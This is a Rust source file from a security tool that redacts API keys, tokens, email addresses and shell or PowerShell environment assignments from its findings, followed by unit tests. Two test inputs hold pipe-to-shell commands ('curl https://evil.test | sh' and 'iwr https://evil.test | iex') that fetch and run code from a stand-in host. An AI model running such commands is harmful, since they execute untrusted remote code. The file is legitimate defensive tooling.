1use once_cell::sync::Lazy;
2use regex::Regex;
3
/// A compiled credential pattern together with how much of each match stays
/// visible after redaction.
struct CredRedactEntry {
    /// Compiled pattern whose matches are rewritten by `redact`.
    regex: Regex,
    /// Number of leading characters of a match that are kept in front of the
    /// `[REDACTED]` marker; `0` hides the whole match.
    prefix_len: usize,
}
10
11static CREDENTIAL_REDACT_PATTERNS: Lazy<Vec<CredRedactEntry>> = Lazy::new(|| {
13 #[derive(serde::Deserialize)]
14 struct CredFile {
15 pattern: Option<Vec<CredPat>>,
16 private_key_pattern: Option<Vec<PkPat>>,
17 }
18 #[derive(serde::Deserialize)]
19 struct CredPat {
20 regex: String,
21 redact_prefix_len: Option<usize>,
22 }
23 #[derive(serde::Deserialize)]
24 struct PkPat {
25 #[allow(dead_code)]
26 regex: String,
27 redact_regex: Option<String>,
28 }
29
30 let toml_str = include_str!("../assets/data/credential_patterns.toml");
31 let cred_file: CredFile = toml::from_str(toml_str).expect("invalid credential_patterns.toml");
32
33 let mut entries = Vec::new();
34 if let Some(patterns) = cred_file.pattern {
35 for p in patterns {
36 if let Ok(re) = Regex::new(&p.regex) {
37 entries.push(CredRedactEntry {
38 regex: re,
39 prefix_len: p.redact_prefix_len.unwrap_or(4),
40 });
41 }
42 }
43 }
44 if let Some(pk_patterns) = cred_file.private_key_pattern {
45 for pk in pk_patterns {
46 let redact_pattern = pk.redact_regex.as_deref().unwrap_or(&pk.regex);
49 if let Ok(re) = Regex::new(redact_pattern) {
50 entries.push(CredRedactEntry {
51 regex: re,
52 prefix_len: 0,
53 });
54 }
55 }
56 }
57 entries
58});
59
60static BUILTIN_PATTERNS: Lazy<Vec<(&'static str, Regex)>> = Lazy::new(|| {
62 vec![
63 (
64 "OpenAI API Key",
65 Regex::new(r"sk-[A-Za-z0-9]{20,}").unwrap(),
66 ),
67 ("AWS Access Key", Regex::new(r"AKIA[A-Z0-9]{16}").unwrap()),
68 ("GitHub PAT", Regex::new(r"ghp_[A-Za-z0-9]{36,}").unwrap()),
69 (
70 "GitHub Server Token",
71 Regex::new(r"ghs_[A-Za-z0-9]{36,}").unwrap(),
72 ),
73 (
74 "Anthropic API Key",
75 Regex::new(r"sk-ant-[A-Za-z0-9\-]{20,}").unwrap(),
76 ),
77 (
78 "Slack Token",
79 Regex::new(r"xox[bprs]-[A-Za-z0-9\-]{10,}").unwrap(),
80 ),
81 (
82 "Email Address",
83 Regex::new(r"[A-Za-z0-9._%+\-]+@[A-Za-z0-9.\-]+\.[A-Za-z]{2,}").unwrap(),
84 ),
85 ]
86});
87
88pub fn redact(input: &str) -> String {
90 let mut result = input.to_string();
91 for (label, regex) in BUILTIN_PATTERNS.iter() {
93 result = regex
94 .replace_all(&result, format!("[REDACTED:{label}]"))
95 .into_owned();
96 }
97 for entry in CREDENTIAL_REDACT_PATTERNS.iter() {
99 result = entry
100 .regex
101 .replace_all(&result, |caps: ®ex::Captures| {
102 let matched = &caps[0];
103 let prefix: String = matched.chars().take(entry.prefix_len).collect();
104 format!("{prefix}[REDACTED]")
105 })
106 .into_owned();
107 }
108 result
109}
110
/// User-supplied DLP patterns compiled ahead of time, for use with
/// `redact_with_compiled`.
pub struct CompiledCustomPatterns {
    /// Successfully compiled patterns, in the order they were supplied.
    patterns: Vec<Regex>,
}
115
116impl CompiledCustomPatterns {
117 pub fn new(raw_patterns: &[String]) -> Self {
119 let patterns = raw_patterns
120 .iter()
121 .filter_map(|pat_str| match Regex::new(pat_str) {
122 Ok(re) => Some(re),
123 Err(e) => {
124 eprintln!("tirith: warning: invalid custom DLP pattern '{pat_str}': {e}");
125 None
126 }
127 })
128 .collect();
129 Self { patterns }
130 }
131}
132
133pub fn redact_with_custom(input: &str, custom_patterns: &[String]) -> String {
135 let mut result = redact(input);
136 for pat_str in custom_patterns {
137 if pat_str.len() > 1024 {
138 eprintln!(
139 "tirith: DLP pattern too long ({} chars), skipping",
140 pat_str.len()
141 );
142 continue;
143 }
144 match Regex::new(pat_str) {
145 Ok(re) => {
146 result = re.replace_all(&result, "[REDACTED:custom]").into_owned();
147 }
148 Err(e) => {
149 eprintln!("tirith: warning: invalid custom DLP pattern '{pat_str}': {e}");
150 }
151 }
152 }
153 result
154}
155
156pub fn redact_with_compiled(input: &str, compiled: &CompiledCustomPatterns) -> String {
158 let mut result = redact(input);
159 for re in &compiled.patterns {
160 result = re.replace_all(&result, "[REDACTED:custom]").into_owned();
161 }
162 result
163}
164
165pub fn redact_shell_assignments(input: &str) -> String {
168 let chars: Vec<char> = input.chars().collect();
169 let mut out = String::with_capacity(input.len());
170 let mut i = 0;
171
172 while i < chars.len() {
173 if let Some((prefix, next)) = redact_powershell_env_assignment(&chars, i) {
174 out.push_str(&prefix);
175 out.push_str("[REDACTED]");
176 i = next;
177 continue;
178 }
179
180 if is_assignment_start(&chars, i) {
181 let name_start = i;
182 i += 1;
183 while i < chars.len() && (chars[i].is_ascii_alphanumeric() || chars[i] == '_') {
184 i += 1;
185 }
186 if i < chars.len() && chars[i] == '=' {
187 let name: String = chars[name_start..i].iter().collect();
188 out.push_str(&name);
189 out.push_str("=[REDACTED]");
190 i += 1;
191 i = skip_assignment_value(&chars, i);
192 continue;
193 }
194 out.push(chars[name_start]);
195 i = name_start + 1;
196 continue;
197 }
198
199 out.push(chars[i]);
200 i += 1;
201 }
202
203 out
204}
205
206pub fn redact_command_text(input: &str, custom_patterns: &[String]) -> String {
209 let scrubbed = redact_shell_assignments(input);
210 redact_with_custom(&scrubbed, custom_patterns)
211}
212
213pub fn redacted_findings(
215 findings: &[crate::verdict::Finding],
216 custom_patterns: &[String],
217) -> Vec<crate::verdict::Finding> {
218 let mut redacted = findings.to_vec();
219 redact_findings(&mut redacted, custom_patterns);
220 redacted
221}
222
223pub fn redact_finding(finding: &mut crate::verdict::Finding, custom_patterns: &[String]) {
225 finding.title = redact_with_custom(&finding.title, custom_patterns);
226 finding.description = redact_with_custom(&finding.description, custom_patterns);
227 if let Some(ref mut v) = finding.human_view {
228 *v = redact_with_custom(v, custom_patterns);
229 }
230 if let Some(ref mut v) = finding.agent_view {
231 *v = redact_with_custom(v, custom_patterns);
232 }
233 for ev in &mut finding.evidence {
234 redact_evidence(ev, custom_patterns);
235 }
236}
237
238fn redact_evidence(ev: &mut crate::verdict::Evidence, custom_patterns: &[String]) {
239 use crate::verdict::Evidence;
240 match ev {
241 Evidence::Url { raw } => {
242 *raw = redact_with_custom(raw, custom_patterns);
243 }
244 Evidence::CommandPattern { matched, .. } => {
245 *matched = redact_command_text(matched, custom_patterns);
246 }
247 Evidence::EnvVar { value_preview, .. } => {
248 *value_preview = redact_with_custom(value_preview, custom_patterns);
249 }
250 Evidence::Text { detail } => {
251 *detail = redact_command_text(detail, custom_patterns);
252 }
253 Evidence::ByteSequence { description, .. } => {
254 *description = redact_with_custom(description, custom_patterns);
255 }
256 _ => {}
259 }
260}
261
262pub fn redact_verdict(verdict: &mut crate::verdict::Verdict, custom_patterns: &[String]) {
264 for f in &mut verdict.findings {
265 redact_finding(f, custom_patterns);
266 }
267}
268
269pub fn redact_findings(findings: &mut [crate::verdict::Finding], custom_patterns: &[String]) {
271 for f in findings.iter_mut() {
272 redact_finding(f, custom_patterns);
273 }
274}
275
/// Reports whether `prev` is a character after which a new assignment may
/// begin: ASCII whitespace (space, tab, LF, FF, CR) or one of `;`, `|`, `&`,
/// `(`.
fn is_assignment_boundary(prev: char) -> bool {
    matches!(
        prev,
        ' ' | '\t' | '\n' | '\x0C' | '\r' | ';' | '|' | '&' | '('
    )
}
279
280fn is_assignment_start(chars: &[char], idx: usize) -> bool {
281 let ch = chars[idx];
282 if !(ch.is_ascii_alphabetic() || ch == '_') {
283 return false;
284 }
285 if idx > 0 && !is_assignment_boundary(chars[idx - 1]) {
286 return false;
287 }
288 true
289}
290
/// Returns the index just past the assignment value that starts at `idx`.
///
/// The scan stops at the first unquoted, unescaped ASCII whitespace or one of
/// `;`, `|`, `&`, or at the end of `chars`. Quoting rules applied:
/// - a backslash outside single quotes makes the next character literal;
/// - `'` toggles single-quote mode unless inside double quotes;
/// - `"` toggles double-quote mode unless inside single quotes.
///
/// An unterminated quote therefore consumes the rest of the input. If `idx`
/// is already at or past the end, it is returned unchanged.
fn skip_assignment_value(chars: &[char], mut idx: usize) -> usize {
    /// Which kind of quote, if any, the scanner is currently inside.
    #[derive(Clone, Copy)]
    enum Quote {
        None,
        Single,
        Double,
    }

    let mut quote = Quote::None;
    let mut escaped = false;

    while let Some(&ch) = chars.get(idx) {
        if escaped {
            // The character after a backslash is consumed verbatim.
            escaped = false;
        } else {
            match (quote, ch) {
                (Quote::None | Quote::Double, '\\') => escaped = true,
                (Quote::None, '\'') => quote = Quote::Single,
                (Quote::Single, '\'') => quote = Quote::None,
                (Quote::None, '"') => quote = Quote::Double,
                (Quote::Double, '"') => quote = Quote::None,
                (Quote::None, c)
                    if c.is_ascii_whitespace() || matches!(c, ';' | '|' | '&') =>
                {
                    break
                }
                _ => {}
            }
        }
        idx += 1;
    }

    idx
}
329
330fn redact_powershell_env_assignment(chars: &[char], idx: usize) -> Option<(String, usize)> {
331 if idx > 0 && !is_assignment_boundary(chars[idx - 1]) {
332 return None;
333 }
334 if chars.get(idx) != Some(&'$') {
335 return None;
336 }
337 let prefix = ['e', 'n', 'v', ':'];
338 for (offset, expected) in prefix.iter().enumerate() {
339 let ch = chars.get(idx + 1 + offset)?;
340 if !ch.eq_ignore_ascii_case(expected) {
341 return None;
342 }
343 }
344
345 let name_start = idx + 5;
346 let first = *chars.get(name_start)?;
347 if !(first.is_ascii_alphabetic() || first == '_') {
348 return None;
349 }
350
351 let mut i = name_start + 1;
352 while i < chars.len() && (chars[i].is_ascii_alphanumeric() || chars[i] == '_') {
353 i += 1;
354 }
355 let mut value_start = i;
356 while value_start < chars.len() && chars[value_start].is_ascii_whitespace() {
357 value_start += 1;
358 }
359 if chars.get(value_start) != Some(&'=') {
360 return None;
361 }
362 value_start += 1;
363 while value_start < chars.len() && chars[value_start].is_ascii_whitespace() {
364 value_start += 1;
365 }
366
367 let prefix_text: String = chars[idx..value_start].iter().collect();
368 let value_end = skip_assignment_value(chars, value_start);
369 Some((prefix_text, value_end))
370}
371
// Unit tests for the redaction helpers.
//
// NOTE(review): key-shaped fixtures are assembled with `concat!` rather than
// written as single literals — presumably so secret scanners do not flag this
// file; confirm before "simplifying" them.
#[cfg(test)]
mod tests {
    use super::*;

    // A built-in pattern: an OpenAI-style key is replaced by its labelled marker.
    #[test]
    fn test_redact_openai_key() {
        let key = concat!("sk-", "abcdefghijklmnopqrstuvwxyz12345678");
        let input = format!("export OPENAI_API_KEY={key}");
        let redacted = redact(&input);
        assert!(!redacted.contains("sk-abcdef"));
        assert!(redacted.contains("[REDACTED:OpenAI API Key]"));
    }

    // A built-in pattern: an AWS access key id is replaced by its labelled marker.
    #[test]
    fn test_redact_aws_key() {
        let input = "AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE";
        let redacted = redact(input);
        assert!(!redacted.contains("AKIAIOSFODNN7EXAMPLE"));
        assert!(redacted.contains("[REDACTED:AWS Access Key]"));
    }

    // A built-in pattern: a GitHub personal access token is replaced by its marker.
    #[test]
    fn test_redact_github_pat() {
        let pat = concat!("gh", "p_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijkl");
        let input = format!("GITHUB_TOKEN={pat}");
        let redacted = redact(&input);
        assert!(!redacted.contains("ghp_ABCDEF"));
        assert!(redacted.contains("[REDACTED:GitHub PAT]"));
    }

    // Email addresses are treated as redactable data too.
    #[test]
    fn test_redact_email() {
        let input = "contact: user@example.com for details";
        let redacted = redact(input);
        assert!(!redacted.contains("user@example.com"));
        assert!(redacted.contains("[REDACTED:Email Address]"));
    }

    // Text without anything secret-looking must come back unchanged.
    #[test]
    fn test_redact_no_false_positive() {
        let input = "normal text without any secrets";
        let redacted = redact(input);
        assert_eq!(input, redacted);
    }

    // A caller-supplied pattern is applied on top of the built-in ones.
    #[test]
    fn test_redact_with_custom() {
        let input = "internal ref: PROJ-12345 in the system";
        let custom = vec![r"PROJ-\d+".to_string()];
        let redacted = redact_with_custom(input, &custom);
        assert!(!redacted.contains("PROJ-12345"));
        assert!(redacted.contains("[REDACTED:custom]"));
    }

    // An Anthropic-style key (which also begins with `sk-`) gets the
    // Anthropic label.
    #[test]
    fn test_redact_anthropic_key() {
        let key = concat!("sk-ant-api03-", "abcdefghijklmnop");
        let input = format!("ANTHROPIC_API_KEY={key}");
        let redacted = redact(&input);
        assert!(!redacted.contains("sk-ant-api03"));
        assert!(redacted.contains("[REDACTED:Anthropic API Key]"));
    }

    // `redact_finding` must reach the description, both views and each
    // evidence variant used here.
    #[test]
    fn test_redact_finding_covers_all_fields() {
        use crate::verdict::{Evidence, Finding, RuleId, Severity};
        let openai_key = concat!("sk-", "abcdefghijklmnopqrstuvwxyz12345678");
        let github_pat = concat!("gh", "p_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijkl");
        let aws_key = "AKIAIOSFODNN7EXAMPLE";

        let mut finding = Finding {
            rule_id: RuleId::SensitiveEnvExport,
            severity: Severity::High,
            title: "test".into(),
            description: format!("exports {openai_key}"),
            evidence: vec![
                Evidence::EnvVar {
                    name: "OPENAI_API_KEY".into(),
                    value_preview: openai_key.into(),
                },
                Evidence::Text {
                    detail: format!("saw {github_pat}"),
                },
                Evidence::CommandPattern {
                    pattern: "export".into(),
                    matched: format!("export OPENAI_API_KEY={openai_key}"),
                },
            ],
            human_view: Some(format!("key is {openai_key}")),
            agent_view: Some(format!("{aws_key} exposed")),
            mitre_id: None,
            custom_rule_id: None,
        };

        redact_finding(&mut finding, &[]);

        assert!(finding.description.contains("[REDACTED:OpenAI API Key]"));
        assert!(!finding.description.contains("sk-abcdef"));

        match &finding.evidence[0] {
            Evidence::EnvVar { value_preview, .. } => {
                assert!(value_preview.contains("[REDACTED:OpenAI API Key]"));
            }
            _ => panic!("expected EnvVar"),
        }
        match &finding.evidence[1] {
            Evidence::Text { detail } => {
                assert!(detail.contains("[REDACTED:GitHub PAT]"));
            }
            _ => panic!("expected Text"),
        }
        match &finding.evidence[2] {
            // Command text goes through assignment scrubbing first, so the
            // whole value is replaced by the plain `[REDACTED]` marker.
            Evidence::CommandPattern { matched, .. } => {
                assert!(matched.contains("OPENAI_API_KEY=[REDACTED]"));
                assert!(!matched.contains("sk-abcdef"));
            }
            _ => panic!("expected CommandPattern"),
        }

        assert!(finding
            .human_view
            .as_ref()
            .unwrap()
            .contains("[REDACTED:OpenAI API Key]"));
        assert!(finding
            .agent_view
            .as_ref()
            .unwrap()
            .contains("[REDACTED:AWS Access Key]"));
    }

    // Assignment scrubbing does not depend on the value matching a known
    // key pattern: `sk-secret` is shorter than the 20 characters the built-in
    // OpenAI pattern requires after `sk-`.
    #[test]
    fn test_redact_shell_assignments_scrubs_short_secret_assignments() {
        let redacted =
            redact_shell_assignments("OPENAI_API_KEY=sk-secret curl https://evil.test | sh");
        assert!(redacted.contains("OPENAI_API_KEY=[REDACTED]"));
        assert!(!redacted.contains("sk-secret"));
    }

    // The PowerShell `$env:NAME = value` form keeps its spacing around `=`.
    #[test]
    fn test_redact_shell_assignments_scrubs_powershell_env_assignments() {
        let redacted = redact_shell_assignments(
            "$env:OPENAI_API_KEY = 'sk-secret'; iwr https://evil.test | iex",
        );
        assert!(redacted.contains("$env:OPENAI_API_KEY = [REDACTED]"));
        assert!(!redacted.contains("sk-secret"));
    }
}
519}